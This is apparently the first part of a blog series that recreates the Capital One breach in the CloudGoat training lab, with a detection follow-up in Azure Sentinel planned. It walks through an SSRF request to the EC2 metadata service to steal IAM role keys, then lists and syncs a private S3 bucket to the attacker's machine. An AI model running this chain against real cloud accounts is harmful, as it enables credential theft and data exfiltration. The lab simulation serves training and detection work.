In July 2019, Capital one suffered one of the biggest data breaches affecting more than 100 million customer accounts and credit card applications. Based on the criminal complaint charging the accused hacker and several technical analysis blogs published post breach, it involved exploiting a Server Side Request Forgery (SSRF) flaw in a web application to obtain Amazon Web Services (AWS) access keys for a highly permissive (S3FullAccess) Identity and Access management (IAM) role to access sensitive files on S3 storage buckets and later exfiltrated the sensitive data to an attacker controlled local storage. This is the first part of two part article in which we will perform the attack simulation of Capital one Breach scenario using Cloud Goat scenario - cloud_breach_s3 which is developed by Rhino Security Labs. In the second part, we will analyze logs generated from simulation and see how we can hunt for some of the attacker techniques from AWS data sources on boarded to Azure Sentinel. We will also walk-through how to ingest relevant data sources, develop detection or hunting queries using Kusto Query Language(KQL) and also use Azure Sentinel incident workflow and investigation features. If you want to check related detections before we publish second part, you can refer Azure Sentinel Pull Request containing Logstash config file, AWSS3Logparser and hunting queries.
Based on the available information about attack, let`s start extracting and mapping the Tactics, Techniques and Procedures (TTPs) used by an attacker to the MITRE’s Tactic and Techniques which recently expanded to include Cloud ATT&CK Techniques. In the below table, we have mapped the attacker techniques and data sources to these techniques.
Figure 1 - Attack activity mapped to ATT&CK tactics and techniques
For attack simulation purpose, we will use the cloudgoat scenario- cloud_breach_s3. According to the summary page of the scenario, attacker starts with anonymous outsider with no access or privileges. He further exploit a misconfigured reverse-proxy server to query the EC2 metadata service and acquire instance profile keys. Then, he uses those keys to discover, access, and exfiltrate sensitive data from an S3 bucket.
You can follow the quick start guide on cloudgoat GitHub to set up your environment or directly use the docker image with pre-configured environment. We have chosen the docker image.
After completing execution of below command, it will drop into a bash shell which has all environment and pre-requisites set. At the first execution, it will download docker image locally.
$docker run -it rhinosecuritylabs/cloudgoat:latest
Step-2 Create AWS config and credential to be used by Cloudgoat
These will be credentials used to create and deploy the scenario by cloudgoat.
Go to the IAM Console and select Users and then Add user.
Enter the Username and Select AWS access type as – Programmatic access – as this will be used via the AWS CLI.
On the next page, select Attach existing policies directly and select Administrator Access.
On the last page, you can either Download .csv with credentials to copy-paste the credentials to the Docker image in home directory under .aws folder, or simply execute aws configure -profile cloudgoat as mentioned below to allow you to enter the credentials manually.
You can issue the following command in the docker image and enter values retrieved from previous steps:
bash-5.0# aws configure --profile cloudgoat
In the next step, configure the whitelist so the vulnerable instance is only accessible from the host you are going to deploy. You can also add the attacker host to whitelist from which you are planning to execute scenario cheat sheet commands.
bash-5.0# ./cloudgoat.py config whitelist
Finally, verify that config and credential files are correctly populated and are located in the home directory under .aws folder.
Verify both files are present in your home directory under .aws folder as shown below.
Step-3 Create and deploy the scenario-cloud_breach_s3
bash-5.0#./cloudgoat.py create cloud_breach_s3 --profile cloudgoat
This command will create 1 Virtual Private Cloud (VPC) with 2 resources - 1 EC2 instance and 1 S3 bucket.
At successful completion, the output should appear similar to below:
We are mimicking the attacker from IP - 18.104.22.168 and issuing cloud_breach_s3 scenario cheat sheet commands against the vulnerable resources created by cloudgoat scenario.
Once completed, our set-up looks like below diagram.
The Attacker uses curl to send a request to a web server and set the host header to IP address of EC2 metadata service which is 169.254.169.254.
Once the command is successful, it will return the Access Key ID, Secret Access Key and Session Token of IAM instance profile attached to the EC2 instance
Once the IAM role`s credential is retrieved, the Attacker can now set their CLI profile to assume the IAM role, which has S3 Full access.
$aws configure --profile erratic
Edit the credential file and enter the aws_session_token which is the <Token> value retrieved from output of curl request. We executed it via the echo command which appended the details to existing credential file such as shown below.
With the IAM role credentials set as CLI profile, the Attacker can then list all the buckets and identify or even access private S3 bucket.
$aws s3 ls --profile erratic
Once the private S3 bucket id has been identified, the attacker can enumerate and download sensitive files to their local machine.
$aws s3 sync s3://cg-cardholder-data-bucket-cgidbqva8iyktl . --profile erratic
This concludes our attack simulation and first part of the series. We will publish second part on 20th Nov which will cover the on-boarding relevant data sources to Azure Sentinel, log ingestion pipeline and threat hunting on the logs generated from the attack simulation.
You must be a registered user to add a comment. If you've already registered, sign in. Otherwise, register and sign in.